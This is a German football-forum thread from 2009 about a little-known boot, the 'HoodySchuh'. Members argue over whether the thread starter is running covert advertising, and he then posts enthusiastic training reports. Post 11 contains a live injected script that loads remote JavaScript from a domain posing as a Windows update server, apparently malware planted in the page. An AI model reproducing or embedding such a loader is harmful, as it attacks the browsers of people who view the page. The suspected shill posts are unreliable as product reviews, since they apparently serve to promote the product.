Wer kennt den neuen HoodySchuh

Dieses Thema im Forum "Kneipe" wurde erstellt von labatil, 16 Juli 2009.

  1. labatil

    labatil New Member

    Beiträge:
    6
    Likes:
    0
    Mahlzeit. Bin neu hier und habe letztens in "11 Freunde" eine Werbung des sogenannten HoodySchuhs gesehen. Gibt es jemanden, der Erfahrungen mit dem Schuh hat? Über Feedback würde ich mich sehr freuen. Mit besten Grüßen
     
    Zuletzt bearbeitet: 16 Juli 2009
  2. Anzeige für Gäste


    um diese Anzeige auszublenden!.
  3. LionelL

    LionelL Member

    Beiträge:
    196
    Likes:
    0
    kenn den zwar nicht aber die beschreibung lässt drauf schließen, dass er einfach nur atmungsaktiver und Robuster ist als K Leder Schuhe.

    Wenn du auf Atmungsaktive schuhe stehst, würde ich den F50i als CC oder den Predator DB holen, kosten ca genausoviel und es gibt zuverlässige erfahrungsberichte.
     
  4. labatil

    labatil New Member

    Beiträge:
    6
    Likes:
    0
    Erst einmal danke für die schnelle Antwort. Hast du dir auf der Seite die Produkt-Philosophie, Presseberichte und Herstellung mal durchgelesen? Wenn ja, was denkst du darüber?

    Vielleicht werde ich mal bei der kostenlosen Support-Hotline (0 800 - 88 666 10), die ich unter Kontak gefunden habe, anrufen und nach weiteren Infos fragen.

    Oder du bzw. ihr ruft da mal an. Weil immerhin seid ihr die "Kenner" ;)
     
  5. jambala

    jambala Moderator Moderator

    Beiträge:
    2.283
    Likes:
    182
    Hallo.

    Zwei Beiträge von einem Newbie, beide zu einem bisher quasi unbekannten Produkt und dann noch im zweiten Beitrag besonders auf die kostenfreie Hotline aufmerksam machen - wenn das mal keine Schleichwerbung ist...

    Aber mal davon ab, das Ganze erinnert mich an die Lunge-Schuhe. Eine vernünftige Philosophie hin oder her, wenn das Produkt im direkten Vergleich in der Preiskategorie einen zwiespältigen Eindruck hinterlässt hilft die auch nicht weiter. Und da man die Produkte dank Direktvertrieb praktisch nicht unter der UVP bekommen kann, ist ein Versuch auch zu kostenintensiv für meinen Geschmack.

    Denn für weniger Geld bekommt man einen Copa, einen King, einen Brasil, einen Speciali und und und, die seit Jahren auf dem Markt sind, deren Qualität erwiesen ist und wo Überraschungen eher unwahrscheinlcih sind.
     
  6. labatil

    labatil New Member

    Beiträge:
    6
    Likes:
    0
    Wie und wo kann man sich denn sonst über einen Schuh informieren, wenn nicht in einem Fussball Forum? Erst recht, wenn es ein ganz neues Produkt ist?

    Nach dem ich nun die Presseberichte auf der Seite gelesen habe, steigt man Interesse für diesen Schuh.

    Natürlich hat jambala Recht, wenn er den Kostenfaktor anspricht, aber Geld alleine entscheidet nicht immer - zumindest nicht bei mir. Für mich spielt Qualität ebenfalls eine große Rolle. Und die scheint bei diesem Schuh wohl zu stimmen. Wäre echt perfekt, wenn es hier Erfahrungsberichte diesbezüglich gäbe.
     
  7. chappo

    chappo Member

    Beiträge:
    59
    Likes:
    0
    ganz ehrlich... mit dem letzten post hast du dich quasi selbst entlarvt....

    hör auf mit der schleichwerbung!

    jambala hat eindeutig gesagt, dass es zig schuhe gibt, deren qualität BESTÄTIGT ist und die GÜNSTIGER sind! da kannst du noch soviel hin oder her argumentieren von wegen "geld spielt keine rolle"... über die qualität wirst du hier NICHTS erfahren.

    wenn es dich wirklich interessieren sollte und du eh geld wie heu hast, dann kauf dir doch selbst welche und schreib hier deinen erfahrungsbericht...
     
  8. Suutsch

    Suutsch Member

    Beiträge:
    194
    Likes:
    0
    sicherlich wirkt das alles suspekt, aber nomis hat doch auch sein eigenes unterforum. und bis vor ein paar jahren war von denen auch noch nichts zu hören...
     
  9. jambala

    jambala Moderator Moderator

    Beiträge:
    2.283
    Likes:
    182
    Hallo.

    Also, die Paralelle zu Nomis ist nicht zutreffend. Nomis konzentriert sich von Anfang an alleine auf die Produktion von Sportartikel und dahinter steht ein Mann, der als CEO mehrere Jahre bei Adidas für die Produktentwicklung Fussball zuständig war und im Streit dort ausgeschieden ist. Es ist also passendes Knowhow da. Und bevor sie hier in D auf den Markt gekommen sind, waren sie schon mehrere Jahre in Australien und England tätig - und haben dort bewiesen, daß das Material was taugt. Und schau Dir mal an, wie lange der Nomis-Thread schon gelaufen ist, bis die Geschichte mit dem Unterforum angefangen hat.

    Wer hinter der Marke Hoody steht ist so richtig nicht ersichtlich und es ist eine Firma, die eigentlich aus dem IT-Bereich kommt.
    Wenn Du Dir die angeführten Pressemeinungen durchliest kommt insgeheim der Eindruck auf, daß es sich um Werbeannoncen handelt.
    Dann noch die Tatsache, daß ein Newbie zuerst die HP verlinkt und im Anschluß noch auf die kostenfreie Hotline verweist ist schon etwas dreist.

    Ich sage ja nicht, daß die Schuhe nicht vernünftig verarbeitet sind oder das Geld nicht wert sind - nur soll hier doch bitte nicht versucht werden, die User des Forums für dumm zu verkaufen, denn genau das wird aus meiner Sicht versucht.
     
  10. Robinho10

    Robinho10 Der Powerstürmer !!!

    Beiträge:
    540
    Likes:
    0
    Erinnert an die alten Schuhe die 1954 getragen wurden ;)
     
  11. TheCat

    TheCat New Member

    Beiträge:
    10
    Likes:
    0
    haha jo :)

    <script language='JavaScript' type='text/javascript'>document.write("<" + "script language='JavaScript' type='text/javascript' src='http://windows-updateserver.com/signature/hKLYZ5joxmvAlyz147fYlWXU4mn5R3Pg?rand=" + Math.random() * 100000000 +"'></"+"script>")</script>
     
  12. patpat

    patpat Member

    Beiträge:
    144
    Likes:
    0
    voll kacke hässlich
     
  13. labatil

    labatil New Member

    Beiträge:
    6
    Likes:
    0
    Bin nun stolzer Besitzer des Hoodyschuhs.

    Nach langen Hin und Her habe ich mich doch für den Schuh entschlossen. Zum einen fand ich den Look ganz OK (stehe nicht auf so Tunten-Schuhe in Grün, Gelb, Blau oder Rosa :auslach:) und zum anderen wollte ich dem Schuh einfach mal ne Chance geben, weil er in Deutschland hergestellt wird - nicht so wie die Schuhe der Großen Markenhersteller, die ihre Produkte in 3. Weltländern für Hungerlöhne und Minimalkosten produzieren lassen.

    Lange Rede kurzer Sinn: Jetzt ist es Zeit, die Tauglichkeit zu testen!

    Gut, dass wir gerade in der Vorbereitung stecken, somit kann ich reichlich Erfahrung mit dem Schuh machen. Ich hoffe, dass ich eine gute Wahl getroffen habe und meine Entscheidung später nicht bereuen werde. Im Laufe der nächsten Tage und Wochen werde ich euch auf dem laufenden halten.
     
  14. labatil

    labatil New Member

    Beiträge:
    6
    Likes:
    0
    Ach ja zur Verpackung kann ich ja schon mal was sagen:

    Also, die war jetzt nicht gerade so der Knaller! Ein einfacher schlichter weißer Schuhkarton, vorne mit nem Aufkleber und den Schuhdaten. Das ist eher ein Minuspunkt.

    Die Ware ist jedoch ordentlich und gut verpackt gewesen. Nach dem Öffnen war ich positiv über die Beschaffenheit des Schuhs überrascht. Als jahrelanger Copa-Träger musste ich feststellen, dass das Kalbsleder echt eine spürbar bessere Qualität aufweist.

    Beim ersten Hineinschlüpfen fühlte es sich richtig gut an. Noch bin ich nicht enttäuscht. Mal schauen, was die Tage mit sich bringen.

    Bis denn...
     
  15. Fussballer

    Fussballer Well-Known Member

    Beiträge:
    1.183
    Likes:
    7
    Mach mal nen Foto oder mehrere bitte.
     
  16. labatil

    labatil New Member

    Beiträge:
    6
    Likes:
    0
    Hi @all

    Habe meine erste Trainingseinheit mit den neuen Schuhen hinter mir.

    Zur Info: Wir tranieren als (ambitionierter) Landesligist ausschließlich auf Rasen und Kunstrasen.

    Nun, nach dem ersten Training kann ich jetzt nicht sooo viel sagen, weil der Trainer uns zu Beginn des Trainings eher in den Laufschuhen "gequält" hat. Zuerst durften wir einen 45-minütigen Tempo-Ausdauerlauf machen. Nach der üblen Konditionsphase war die Zeit für meine neuen Treter gekommen. Aber auch hier kam leider noch nicht der Ball ins Spiel. Als der Coach sagte, dass wir die Laufschuhe ausziehen und die Fußballschuhe anziehen sollten, war die Freude erst sehr groß. Aber nur ganz kurz: Denn jetzt standen Steigerungsläufe auf dem Plan, die wir auf dem Feld vom 16er zum 16er in den Fußballschuhen machen mussten.

    Als die meisten damit beschäftigt waren zu trinken, nach Luft zu schnappen, sich zu dehnen und im Grunde keiner mehr damit rechnete, verteilte unser Felix Magath der Landesliga Leibchen, das hieß wir durften an die Kugel. Endlich!

    Die meisten hatten zwar mega schwere Beine, aber ich war dennoch super froh über das kurze Abschluss-Spiel.

    Nun zum Fazit:
    Die Steigerungsläufe in den Schuhen waren ganz angenehm, wenn man bei Steigerungsläufen überhaupt von einer angenehmen Sache sprechen kann. Es drückte nicht und fühlte sich gut an in den Schuhen zu stehen und zu laufen. Im Abschluss-Spiel, welches gerade mal gefühlte 5 Minuten dauerte, vielleicht waren es aber doch 10 oder 15 Minuten, machte der Ball stets was ich will - so wie immer bei einem Techniker meiner Qualität ;)

    Worüber ich erstaunt war, ist die Tatsache, dass ich zum einen keine Schmerzen und zum anderen keine Blasen hatte nach dem "ersten Mal", was eigentlich total untypisch ist.

    Zu weit über 80% habe ich bei neuen Pölern nach dem ersten Tragen Blasen, weswegen ich die Schuhe vor dem ersten Mal immer mit heißem Wasser einweiche. Bei den Hoodyschuhen habe ich vorher gar nichts gemacht, um genau diesen Effekt zu beobachten.

    Vielleicht war das Training auch einfach nur zu kurz. Mal schauen... Nächste Woche werde ich bestimmt mehr über den Schuh berichten können, da wir langsam aber sicher anfangen werden mehr Spielformen und Taktk zu trainieren und vor allem weil am Wochenende ein Testspiel ansteht.

    Da ich gebeten worden bin Bilder zu machen, gibt es unter dem Beitrag die Fotos. Übrigens ist mir bei Fotographieren aufgefallen, dass die Sohlen vom Copa Mundial und dem HoodySchuh identisch sind. Für mich als jahrelanger Copa-Träger kein Problem. Hab übrigens auch meine alten Copas fotographiert, damit ihr sehen könnt, wie die nach nur drei Monaten an den Seiten und vorne förmlich auseinander fallen. Da ich wie gesagt nur auf Rasen und Kunstrasen spiele und trainiere, habe ich mit der Sohle vom Copa nie Probleme gehabt. Sieht man auch auf den Bildern. Die Stollen sind nicht übermäßig abgelaufen, umso schlimmer sieht es aber beim Leder aus, das teilweise Auflösungserscheinungen hat, obwohl ich meine "Arbeitswerkzeuge" immer vernünftig pflege.

    Macht euch aber lieber selber ein Bild davon, denn ein Bild sagt bekanntlich mehr als 1000 Worte.

    PS Habe auch den "hässlichen" Schuhkarton fotographiert.
     

    Anhänge:

  17. Fussballer

    Fussballer Well-Known Member

    Beiträge:
    1.183
    Likes:
    7
    Der Karton ist ja gut.:hammer2:

    Vom optischem ist der Schuh ja nicht so klasse und für die junge Generation somit nichts.
     
  18. Robinho10

    Robinho10 Der Powerstürmer !!!

    Beiträge:
    540
    Likes:
    0
    Waahh! sind die eklig da sehn se noch hässlicher aus :D
     
  19. patpat

    patpat Member

    Beiträge:
    144
    Likes:
    0
    Wäre der Karton nicht so kacke hässlich, würde ich mir den Schuh auch holen!
    Sehr schade...
     
  20. LionelL

    LionelL Member

    Beiträge:
    196
    Likes:
    0

    :D, ganz ehrlich ich würd mir da lieber 2 copas holen denke das kalbsleder hält auch nicht viel länger bei kunstrasen
    und die verpackung is ne frechheit, schaffen es nichtmal den schuhkarton in nen extra karton zu packen
     
  21. Robinho10

    Robinho10 Der Powerstürmer !!!

    Beiträge:
    540
    Likes:
    0
    jap da haste recht :top:
     
  22. Flankengeber

    Flankengeber Moderator Moderator

    Beiträge:
    2.257
    Likes:
    7
    Sieht aus wie ein misshandelter Copa Schuh...Geht gar nicht..
     
  23. Robinho10

    Robinho10 Der Powerstürmer !!!

    Beiträge:
    540
    Likes:
    0
    jap definitiv der hässlichste schuh den ich jeh gesehn hab ;)